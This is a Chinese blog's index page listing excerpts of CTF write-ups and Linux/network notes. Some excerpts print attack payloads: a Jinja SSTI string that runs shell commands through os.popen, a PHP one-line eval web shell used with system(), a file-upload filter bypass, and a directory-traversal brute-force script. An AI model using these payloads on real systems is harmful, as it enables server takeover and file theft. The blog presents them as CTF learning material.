爱在西元间 - 博客园

wireshark从入门到精通1

摘要：一、介绍二、推荐资料：三、视频作者：四、课程对象：五、授权发布平台：六、更多技术交流：七、联系方式：八、课程体系：阅读全文

posted @ 2021-10-10 21:50 爱在西元间阅读(148) 评论(0) 推荐(0)

Flask_FileUpload

摘要：有个提示，上传一个py，他会返回结果给我但是有限制，只能png、jpg，新建一个png图片，把py代码放进去或者在burpsuite里改也行，后面就是本地系统命令找flag文件，然后cat 阅读全文

posted @ 2021-09-30 11:11 爱在西元间阅读(194) 评论(0) 推荐(0)

Simple_SSTI_2

摘要：先用简单的语句测试下，可以返回运算结果再执行系统命令find找到flag文件后，直接cat http://114.67.246.176:13466/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat /app/flag') 阅读全文

posted @ 2021-09-30 10:01 爱在西元间阅读(694) 评论(0) 推荐(0)

snort配置

摘要： 1、查系统所有网卡 snort.exe -W 2、监听3接口 snort.exe -i3 -v 阅读全文

posted @ 2021-09-29 13:00 爱在西元间阅读(67) 评论(0) 推荐(0)

攻防世界CTF-simple_js

摘要： 1、题目的样子，要输入密码 2、随便输了下，回车后 3、直接F12看看源码先 function dechiffre(pass_enc) { var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"; var tab = 阅读全文

posted @ 2021-09-28 16:43 爱在西元间阅读(424) 评论(0) 推荐(0)

python requests库爆破目录遍历漏洞找flag

摘要：题目的页面题目的目录遍历有一定规律，都是数字排序，而且只有两层目录 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests url = "http://challenge-cf866d8944333af5.sandbox.ctfh 阅读全文

posted @ 2021-09-27 10:02 爱在西元间阅读(300) 评论(0) 推荐(0)

php一句话马的手工利用

摘要：比如下面的一句话php <?php @eval($_POST['shell']);?> 通过在hackbar中输入shell=system("find / -name 'flag*'");就可以查找本地flag文件（末尾带上分号;）同样windows系统也可以执行系统命令参考：一句话木马（we 阅读全文

posted @ 2021-09-26 14:50 爱在西元间阅读(303) 评论(0) 推荐(0)

bash: /usr/bin/python3: No such file or directory

摘要： bash: /usr/bin/python3: No such file or directory 原因为/usr/bin/下无python3或软连接，用ln -s /usr/local/python3.9.7/bin/python3 /usr/bin/python3即可参考： Centos7 下阅读全文

posted @ 2021-09-02 04:28 爱在西元间阅读(5848) 评论(1) 推荐(0)

免责申明！！

摘要：本博客漏洞复现文章，渗透测试文章，仅供学习参考，请勿用于实战！！有授权情况下除外！！由于传播、利用本博客文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责。《网络产品安全漏洞管理规定》第一条为了规范网络产品安全漏洞发现、报告、修补和发布等行为，防范网络安全风险，根据《中阅读全文

posted @ 2021-09-01 15:08 爱在西元间阅读(70) 评论(0) 推荐(0)

ps aux和ps -ef的区别

摘要： ps aux可以看进程占用的cpu、mem、虚拟内存 ps -ef可以看进程的父pid 都可以看完整的command字段阅读全文

posted @ 2021-09-01 07:34 爱在西元间阅读(309) 评论(0) 推荐(0)

路漫漫其修远兮，吾将上下而求索

导航

公告